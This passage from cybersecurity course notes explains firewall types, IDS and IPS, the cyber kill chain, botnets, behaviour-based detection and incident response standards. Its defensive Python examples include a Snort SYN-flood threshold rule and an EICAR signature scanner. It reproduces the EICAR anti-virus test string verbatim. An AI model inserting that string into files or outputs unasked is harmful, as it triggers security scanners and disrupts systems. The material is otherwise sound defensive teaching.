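    return [(stateless_filter(STATELESS_RULES, p), fw.filter(p)) for p in trace]


def exhaust_state(n_connections: int, max_entries: int) -> int:
    """Open n_connections from inside against a table of max_entries and
    return how many new connections the stateful firewall refused."""
    fw = StatefulFirewall(max_entries=max_entries)
    refused = 0
    for port in range(50000, 50000 + n_connections):
        if fw.filter(Packet("10.0.0.9", port, "203.0.113.10", 443, "S")) == "deny":
            refused += 1
    return refused


if __name__ == "__main__":
    for p, (a, b) in zip(TRACE, compare()):
        print(f"{p.src_ip}:{p.src_port} -> {p.dst_ip}:{p.dst_port} "
              f"{p.flags:2} stateless={a:6} stateful={b}")
    print("connections refused with a 3-entry table:", exhaust_state(5, 3))
```

The first three packets pass both firewalls. The fourth passes the stateless filter, because its header matches the reply rule, and is dropped by the stateful one, because no inside host opened that connection. `exhaust_state` shows the trade-off the text describes: with a table of three entries, two of five new connections are refused.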

Circuit level
A circuit-level firewall allows connections based on valid session criteria such as time of day and TCP
handshake status. It acts as a proxy and so it provides the advantage of hiding internal resources. It
is also inexpensive. However, it does not perform packet filtering and so once a connection has been
established malicious packets could enter through the connection. Because of this, a circuit-level
firewall is often used in conjunction with a packet filtering firewall to form a dynamic (hybrid)
firewall. This however increases complexity of implementation and maintenance and adds to the
financial cost.

Application level
An application-level firewall performs deep packet inspection by looking at the application program
format in the payload and acts as a proxy. Although this is more secure than simple packet filtering,
it does incur significant resource usage, and this makes it slower than a packet filter firewall.
Application-level firewalls consist of complete operating systems and so they are vulnerable to bugs
and problems affecting OS components.

Next Generation
The jury is out on exactly what a ‘Next Generation’ firewall is, as the term is used in marketing hype.
However, some characteristics of an NG firewall might include IPS ability and deep-packet inspection.

Intrusion Detection system


An Intrusion Detection System (IDS) monitors inbound and outbound network traffic, checking for
abnormal activity (heuristic IDS) or for a known pattern or signature of data bits (signature IDS) that
is malicious or against the network policy.

A heuristic IDS may be able to detect a previously unheard-of attack by checking for unusual activity,
whilst a signature-based IDS detects threats that match known signatures in its database. When an
anomaly or relevant signature is detected the IDS can report the activity to an administrator via
email/SMS, keep a log file to be checked at a later time, and send messages to devices such as
firewalls to take action.

Figure 4 - IDS

An IDS can be network based, or host based. A host-based IDS is applied to a specific host rather
than to an entire network or section of a network. Common software used for detecting threats
include Snort, Suricata, Bro and SolarWinds.

Intrusion Prevention System (IPS)


Due to improvements in technology an IDS is usually part of an IPS nowadays. An IPS ‘intercepts/
filters’ unwanted traffic, whether that be malicious or simply against network policy. An IPS is
different from an IDS in that it filters as well as monitors. Originally an IDS had to be a “monitor only
device” because it was too slow to filter traffic. When technology advances made IDSs fast enough to
be placed in line with the traffic and filter it, they could start to be called IPSs.

Figure 5 - IPS

IPS, IDS & Firewall differences


There are distinct differences between a firewall, IDS and IPS as follows.

A firewall checks the header only and not the payload of a packet. It matches rules against protocol
type, source address, destination address, source port, and/or destination port.

An IDS detects anomalies or signatures in a packet’s header and payload. The rules are more
complicated than simple port or address matching and involve factors such as timing and
throughput. An IDS does not drop packets but only relays or logs information for further action by a
device or administrator.

An IPS performs the complex detection of an IDS but can also drop packets and shut systems or
network segments down. The difference between an IDS and an IPS can be as simple as changing a
device’s option from log only to log and drop.

Unified Threat Management System (UTM)


When the features of a firewall, IPS and IDS are combined, and then further combined with features
such as anti-virus, anti-spam and content filtering, the result is referred to as a Unified Threat
Management system. Although the industry is incorporating more UTMs, they are not a complete
solution as they are a single point of failure, may have performance issues and are costly.

Router
Aside from the ability to route network traffic, routers often have features that enhance a network’s
security such as firewalls, content filtering and Access Control Lists (ACLs). ACLs are filters that allow
or deny packets based on destination and source IP addresses, ports, and protocols. ACLs however do
not examine a packet’s content or state as firewalls may do.

Switch
A switch may also have ACLs and in addition may support port security and Virtual Local Area
Networks (VLANs). Port security involves assigning MAC addresses to ports so that only a device with
a specific MAC address is allowed access to a specific port. So, if another device is plugged in to that
switch port, the device is denied access. After this occurrence, the switch port may stay disabled until
reset by an administrator.

VLANs are separate networks that can be configured on a switch. For example, the first 12 ports on a
switch can be configured for one network, whilst the other 12 ports are configured for a different
network. This network segmentation keeps the devices from communicating with each other, and so
critical devices can be placed on different networks to prevent local as well as remote access.

5.2 Terms such as botnets, the cyber kill chain process and behavior based security in the context of
cyber security protection methodologies are explained.

Cyber kill chain


The Kill Chain is a military term that has been applied to cyber security and refers to the structure of
an attack from reconnaissance through to action. The seven steps in the chain are as follows.

 Reconnaissance – e.g. collecting information such as email addresses and IP addresses
 Weaponization – e.g. prepare an exploit along with a backdoor
 Delivery – e.g. deliver the exploit via email or Internet
 Exploitation – e.g. exploit a vulnerability such as open a command shell on the target
 Installation – e.g. install malicious software such as a keylogger on the target
 Command and Control – e.g. keep the communication channel open
 Actions on Objectives – e.g. delete data

The entire chain cannot be applied to all attack types, as not all attacks attempt to install malware
and maintain communications. However, because a break anywhere in the chain prevents an attack,
the kill chain model enables defenders to target their defences at one or more points of the chain.

Activity – Visit Lockheed Martin then download and read “Apply cyber kill chain methodology”:

https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
Botnet
A Botnet is an abbreviated term for ‘Robot Network’. A botnet is a network of automated devices
that carry out attacks. For example, hundreds of thousands of individual home routers and IP
cameras were controlled and used in a Distributed Denial of Service attack to take down ‘Dyn’. Dyn is
a DNS service provider to companies such as Netflix. The result was Denial of service to Netflix and
other major companies.

Behaviour based security (or heuristics)


Behaviour based security refers to an approach that attempts to assess the risk that a human
activity, or computer activity, is malicious based on characteristics and patterns, that is to say based
on anomalies and the way that it acts, rather than on exact signatures. Anti-virus programs and
Intrusion Prevention Systems use signature-based security, but they also use behaviour based
security. For example, the rule below is used by the Snort IDS to detect SYN flood attacks. It causes an
alert if the number of SYN packets aimed at port 80 is greater than 1000 in a 60 second period.

alert tcp any any -> 192.168.56.102 80 (msg:"TCP SYN flood attack detected"; flags:S; threshold: type threshold, track by_dst, count 1000, seconds 60; sid:5000001; rev:1;)
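What the threshold clause actually does is easiest to see by re-implementing it. The following is an added example in Python, not Snort’s own code: it counts pure SYN packets to 192.168.56.102 port 80 per destination (track by_dst) and raises an alert when the count reaches 1000 inside a 60 second window, then runs that logic over a constructed packet trace of normal browsing, a flood, and unrelated traffic. The ‘type threshold’ behaviour is approximated as “alert on every count-th matching packet in the window”; Snort has further threshold modes that are not modelled.

```python
"""A simplified model of the Snort threshold rule quoted above, run over a
constructed packet trace: TCP SYNs to 192.168.56.102 port 80 are counted per
destination (track by_dst) and an alert fires when 1000 arrive within a 60
second window.

Added example, not Snort's own code: the packets are constructed, and the
'type threshold' behaviour is approximated as "alert on every count-th
matching packet inside the window" (Snort has further threshold modes).
"""
from collections import namedtuple

Packet = namedtuple("Packet", "ts src_ip dst_ip dst_port flags")


class ThresholdRule:
    """Header match + flags:S + threshold tracking, like the quoted rule."""

    def __init__(self, dst_ip="192.168.56.102", dst_port=80,
                 count=1000, seconds=60,
                 msg="TCP SYN flood attack detected"):
        self.dst_ip, self.dst_port = dst_ip, dst_port
        self.count, self.seconds, self.msg = count, seconds, msg
        self.windows = {}  # track-by_dst key -> (window_start, syn_count)

    def matches(self, p: Packet) -> bool:
        return (p.dst_ip == self.dst_ip and p.dst_port == self.dst_port
                and p.flags == "S")  # a pure SYN, as flags:S requires

    def process(self, p: Packet):
        """Return an alert string if this packet trips the threshold."""
        if not self.matches(p):
            return None
        start, n = self.windows.get(p.dst_ip, (p.ts, 0))
        if p.ts - start >= self.seconds:   # window expired: start afresh
            start, n = p.ts, 0
        n += 1
        if n >= self.count:                # count reached inside the window
            self.windows[p.dst_ip] = (start, 0)
            return (f"{self.msg} (dst {p.dst_ip}, {self.count} SYNs within "
                    f"{self.seconds}s, t={p.ts:.3f})")
        self.windows[p.dst_ip] = (start, n)
        return None


def run(rule: ThresholdRule, packets) -> list:
    """Feed packets through the rule in order; return the alerts raised."""
    return [a for a in (rule.process(p) for p in packets) if a]


def constructed_trace() -> list:
    """Normal browsing, then a SYN flood, then unrelated traffic."""
    pkts = []
    # 50 SYNs from a handful of clients spread over ten minutes
    for i in range(50):
        pkts.append(Packet(i * 12.0, f"192.168.56.{10 + i % 5}",
                           "192.168.56.102", 80, "S"))
    # 1200 SYNs from many sources within 30 seconds, starting at t=700
    for i in range(1200):
        pkts.append(Packet(700 + i * 0.025, f"10.{i % 7}.{i % 11}.{i % 251}",
                           "192.168.56.102", 80, "S"))
    # SYNs to a different host and ACKs to the web server: neither matches
    for i in range(200):
        pkts.append(Packet(700 + i * 0.1, "10.9.9.9", "192.168.56.103", 80, "S"))
        pkts.append(Packet(700 + i * 0.1, "192.168.56.12", "192.168.56.102", 80, "A"))
    return sorted(pkts, key=lambda p: p.ts)


if __name__ == "__main__":
    for alert in run(ThresholdRule(), constructed_trace()):
        print(alert)
```

Over this trace exactly one alert is raised, at the 1000th SYN of the flood, about 25 seconds into it; the fifty ordinary SYNs never accumulate because each 60 second window is reset before the count gets anywhere near 1000, and the ACKs and the SYNs to the other host are never counted. Raising `count` or shortening `seconds` in the rule changes how aggressive the detection is, which is the tuning an administrator does to balance missed floods against false alarms.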

Examples of human based behaviour security include comparing login dates, login times, data
bandwidth usage and programs accessed. If a human’s pattern deviates from the usual, for example
logging in at 1am, the event is flagged as a potential security issue.

Anti-virus programs also use heuristic analysis to detect ‘unknown’ viruses by looking for suspicious
properties. Two heuristic methods are static analysis and dynamic analysis.

 Static analysis – a suspect program’s source code is examined and compared with an existing
database; if a certain percentage of the code matches, it is flagged as an issue. Code
similarities like this may show a file to be a family variant of a known virus. Static analysis
also includes inspecting a file to determine its purpose and destination, which might provide
evidence of malicious intent.
 Dynamic analysis – a suspect program is executed in a virtual environment and watched for
suspicious behaviour such as self-replication and overwriting files.

All major anti-virus software provides signature-based as well as heuristic analysis. A downside
to heuristic analysis is that it may produce false positives: a file may be flagged as malicious
when in fact it is benign. Heuristic analysis may also produce false negatives and thus let viruses
through.

In contrast to anomaly detection, the following text is an example of a signature used by an anti-virus
program.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

The signature is known as ‘EICAR’ and is designed as a test signature for anti-virus programs.
https://www.eicar.org/?page_id=3950

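A signature check is an exact match, and the EICAR test file shows the edge cases that even an exact match has to handle. The following is an added example in Python, not any anti-virus vendor’s code: it reports a match when a file is the EICAR test file as the EICAR specification defines it (the 68-byte string at the very start, optionally followed by whitespace, total length at most 128 bytes), reports ‘embedded’ when the string merely appears somewhere in the file, and ‘clean’ otherwise. The sample “files” are constructed in memory.

```python
"""Signature-based detection shown with the EICAR test string: the scanner
reports a match when a file is the EICAR test file as EICAR specifies it
(the 68-byte string at the very start, optionally followed by whitespace,
total length at most 128 bytes).

Added example, not an anti-virus vendor's code. The sample "files" are
constructed in memory so nothing is written to disk.
"""

# The 68-byte EICAR string from the text (the backslash is escaped for Python).
EICAR_SIGNATURE = (b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$"
                   b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*")
assert len(EICAR_SIGNATURE) == 68

# Padding EICAR permits after the string: space, tab, CR, LF, CTRL-Z.
ALLOWED_TRAILER = b" \t\r\n\x1a"
MAX_LENGTH = 128


def is_eicar_test_file(data: bytes) -> bool:
    """Exact match with the edge cases the EICAR specification allows."""
    if not data.startswith(EICAR_SIGNATURE) or len(data) > MAX_LENGTH:
        return False
    trailer = data[len(EICAR_SIGNATURE):]
    return all(byte in ALLOWED_TRAILER for byte in trailer)


def contains_eicar(data: bytes) -> bool:
    """Looser check: the string anywhere in the file, as a plain pattern
    scan would report it."""
    return EICAR_SIGNATURE in data


def scan(samples: dict) -> dict:
    """Verdict per sample: 'match', 'embedded' or 'clean'."""
    verdicts = {}
    for name, data in samples.items():
        if is_eicar_test_file(data):
            verdicts[name] = "match"
        elif contains_eicar(data):
            verdicts[name] = "embedded"
        else:
            verdicts[name] = "clean"
    return verdicts


# Constructed samples exercising the rules above.
SAMPLES = {
    "eicar.com": EICAR_SIGNATURE,
    "eicar_crlf.txt": EICAR_SIGNATURE + b"\r\n",
    "eicar_too_long.txt": EICAR_SIGNATURE + b" " * 70,   # 138 bytes > 128
    "eicar_in_text.txt": b"Some text, then " + EICAR_SIGNATURE,
    "one_byte_changed.txt": EICAR_SIGNATURE[:-1] + b"#",
    "hello.txt": b"hello world\n",
}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:24} {verdict}")
```

The last two samples make the text’s point about signatures: a file that differs from the signature by a single byte is reported clean, which is exactly the gap that heuristic and behaviour-based analysis exist to cover.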
5.3 Methods for protecting an organisation from cyber-attacks are developed and evaluated

Methods for protecting an organisation from cyber-attack


There are many tools and processes that can be used to protect against cyber-attack. Organisations
such as the Australian Signals Directorate, Business.gov.au and Scam watch list various strategies.

Activity – Visit cyber.gov.au and review the 37 strategies for five specific areas of attack.
Review the supporting documents also.

https://www.cyber.gov.au/publications/strategies-to-mitigate-cyber-security-incidents
https://www.cyber.gov.au/publications/strategies-to-mitigate-cyber-security-incidents-mitigation-details
https://www.cyber.gov.au/ism

Activity – Visit Scam Watch and review their techniques for avoiding scams.

https://www.scamwatch.gov.au/get-help/protect-yourself-from-scams

Activity – Visit Business.gov.au and review their techniques for keeping your business
safe.

https://www.business.gov.au/risk-management/cyber-security/keep-your-business-safe-from-cyber-threats

Cyber security standards bodies


A standards body is an organisation dedicated to developing standards for users operating within
various areas such as automotive, building, telecommunications and cyber security. There are
various bodies dedicated to the development of standards. Examples of bodies include the National
Institute of Standards and Technology (NIST), the British Standards Institution (BSI), the Internet
Engineering Task Force (IETF), the Payment Card Industry Security Standards Council (PCI SSC), the
International Organization for Standardization (ISO), and Standards Australia. Standards Australia is
the Australian representative of the ISO.

Activity – Visit Standards Australia and search for “information security” related
products. Make a list of all relevant products.

https://www.standards.org.au/

Enterprise Security frameworks


Standards bodies and others produce security frameworks. A security framework is a defined set of
policies and procedures for the management of information security. By adhering to a security
framework an enterprise can be better protected than otherwise. Framework types can be classified
as control frameworks, program frameworks or risk frameworks. Example frameworks include ISO
27000, COBIT, NIST 800-53 and NIST 800-171.

Activity – Visit Tech Republic and review framework types

https://www.techrepublic.com/article/how-to-choose-the-right-cybersecurity-framework/

Activity – Visit Tech Target and review security frameworks

https://searchsecurity.techtarget.com/tip/IT-security-frameworks-and-standards-Choosing-the-right-one

Create a matrix showing, for each framework:

 Who developed or auspices the framework?
 How long has it been in use?
 What are the key topics it covers?
 Who are the main users of the framework?
 What is unique or noteworthy about the framework?

5.4 Introduction to behavior-based approach to cyber security is presented

Behaviour based approach to cyber security (Behavioural analytics)


A behaviour-based approach to cyber security refers to analysing the previous behaviours of a user
account and comparing them to current behaviours as a method of detecting security breaches. The
pattern of use established over time by a computer account is somewhat unique. Examples of
behaviours include the following.

 Login days/times
 applications used
 websites visited
 types of data accessed
 amount of data transferred
 speed of typing
 geographic location
 deviations from a peer group’s activities

If a user’s account varies from known patterns a detection system can notice this and block or
provide an alert about such deviations. Such deviations from the norm may mean a user is doing
something malicious either intentionally or accidentally, or that a user’s account has been
compromised and is in use by a hacker.

Activity – Visit IBM to view a video about QRadar, a behavioural analytics program

https://www.ibm.com/us-en/marketplace/qradar-user-behavior-analytics
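The human-based examples given under behaviour based security in 5.2 (login dates and times, a 1am login) and the list of behaviours above come together in a small detector. The following is an added example in Python, not QRadar or any vendor’s code: a baseline of each user’s usual login hours and countries is learnt from past successful logins, and new events are then scored for deviations: a login outside the usual hours, a login from a new country, and a burst of failed logins (the accounting side of AAA). The users, hours, countries and log lines are constructed, and the baseline is a simple set of hours with a one-hour tolerance, standing in for the richer statistical models real products use.

```python
"""Behaviour-based detection over a login log: a baseline of each user's
usual login hours and locations is learnt from past successes, then new
events are scored for deviations (a 1am login for an office-hours user, a
new country, a burst of failed logins).

Added example (not QRadar or any vendor's code): the users, hours, countries
and log lines are constructed, and the baseline is a simple set of hours plus
a one-hour tolerance, a stand-in for the richer models real products use.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: "<ISO timestamp> <user> <success|failure> <country>"
BASELINE_LOG = """\
2020-05-04T08:55:12 alice success AU
2020-05-04T17:10:02 alice success AU
2020-05-05T08:47:03 alice success AU
2020-05-06T09:01:44 alice success AU
2020-05-07T17:32:15 alice success AU
2020-05-04T09:02:40 bob success AU
2020-05-05T10:15:09 bob success AU
2020-05-06T13:20:31 bob success AU
2020-05-07T09:05:50 bob success AU
"""

NEW_LOG = """\
2020-05-11T08:58:21 alice success AU
2020-05-11T01:07:33 alice success AU
2020-05-11T09:15:12 bob success RO
2020-05-11T09:20:00 bob failure AU
2020-05-11T09:21:30 bob failure AU
2020-05-11T09:23:05 bob failure AU
2020-05-11T09:30:00 carol success AU
"""


def parse(log: str) -> list:
    """Turn the constructed log lines into event dicts."""
    events = []
    for line in log.strip().splitlines():
        ts, user, result, country = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "user": user,
                       "result": result, "country": country})
    return events


def build_baseline(events: list) -> dict:
    """Per user: the set of hours and countries seen in successful logins."""
    baseline = defaultdict(lambda: {"hours": set(), "countries": set()})
    for e in events:
        if e["result"] == "success":
            baseline[e["user"]]["hours"].add(e["ts"].hour)
            baseline[e["user"]]["countries"].add(e["country"])
    return dict(baseline)


def hour_is_usual(hour: int, usual_hours: set, tolerance: int = 1) -> bool:
    """Within `tolerance` hours of any hour the user has logged in at before."""
    return any(abs(hour - h) <= tolerance for h in usual_hours)


def detect(events: list, baseline: dict, fail_limit: int = 3,
           fail_window: timedelta = timedelta(minutes=10)) -> list:
    """Return (user, timestamp, reasons) for every event that deviates."""
    alerts = []
    recent_failures = defaultdict(list)
    for e in events:
        reasons = []
        profile = baseline.get(e["user"])
        if profile is None:
            reasons.append("no baseline for user")
        else:
            if not hour_is_usual(e["ts"].hour, profile["hours"]):
                reasons.append(f"unusual hour {e['ts'].hour:02d}:00")
            if e["country"] not in profile["countries"]:
                reasons.append(f"new location {e['country']}")
        if e["result"] == "failure":   # accounting: track failed attempts
            window = recent_failures[e["user"]]
            window.append(e["ts"])
            window[:] = [t for t in window if e["ts"] - t <= fail_window]
            if len(window) >= fail_limit:
                reasons.append(f"{len(window)} failed logins within {fail_window}")
        if reasons:
            alerts.append((e["user"], e["ts"].isoformat(), reasons))
    return alerts


def run() -> list:
    """Baseline from BASELINE_LOG, detection over NEW_LOG."""
    return detect(parse(NEW_LOG), build_baseline(parse(BASELINE_LOG)))


if __name__ == "__main__":
    for user, ts, reasons in run():
        print(f"{ts} {user}: {'; '.join(reasons)}")
```

Four of the seven new events are flagged: alice’s 1am login, bob’s login from a country not in his history, bob’s third failed login inside ten minutes, and a login by carol for whom no baseline exists. The 08:58 login and the first two failures pass quietly, which is the point of a baseline: an alert is raised on deviation from the user’s own pattern, not on a fixed rule.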

5.5 Incident response standards are defined

Incident Response Standards


A computer security incident as defined by the National Institute of Standards and Technology is
“… a violation or imminent threat of violation of computer security policies, acceptable use policies,
or standard security practices” - https://csrc.nist.gov/glossary/term/incident (accessed 29 May
2020).

Examples of incidents are:

 An attacker commands a botnet to send high volumes of connection requests to a web
server, causing it to crash.
 Users are tricked into opening an email attachment titled “quarterly report” which
contained malware; running the tool has infected their computers and established
connections with an external host. (Cichonski et al., 2012)²

There are various standards developed for responding to incidents including:

 Computer Security Incident Handling Guide (NIST)
 ISO 27035-1:2016 Part 1: Principles of incident management
 Prepare for cyber incident (vic.gov.au)

The basic steps involved within all these standards are as follows.

1. Detection and Analysis
2. Containment and Eradication
3. Communications and Engagement
4. Recover
5. Learn and Improve

Activity – Visit NIST and review SP 800-61, Computer Security Incident Handling Guide.

Internet search: NIST.SP.800-61r2.pdf

² Cichonski, P., Millar, T., Grance, T. and Scarfone, K. (2012) Computer Security Incident Handling
Guide, NIST Special Publication 800-61 Revision 2. NIST.

Activity – Visit vic.gov.au and review the Cyber Incident Template.

https://www.vic.gov.au/prepare-cyber-incident

Other organisations, such as the SANS institute (SysAdmin, Audit, Network and Security), may vary
the names and groupings of the steps given above, but essentially the procedure is the same.

Activity – Visit SANS Institute and review the Incident Handler’s Handbook.

https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901

Activity – Visit AlienVault (now AT&T Cybersecurity) and review the difference between
NIST and SANS

https://www.alienvault.com/blogs/security-essentials/incident-response-steps-comparison-guide

Revisions
030919 (V7)
Added Cyber security standards bodies and Enterprise Security Frameworks at 5.3

060919 (V8)
Added activities to 4.4 Protecting personal privacy

290520 (V9)
Added password cracking activity
Replaced deadlines

290531 (V9.1)
Added Installing & Configuring Active Directory
Replaced reference to Installing Kaspersky with Installing Comodo due to Kaspersky controversy
(https://en.wikipedia.org/wiki/Kaspersky_bans_and_allegations_of_Russian_government_ties)
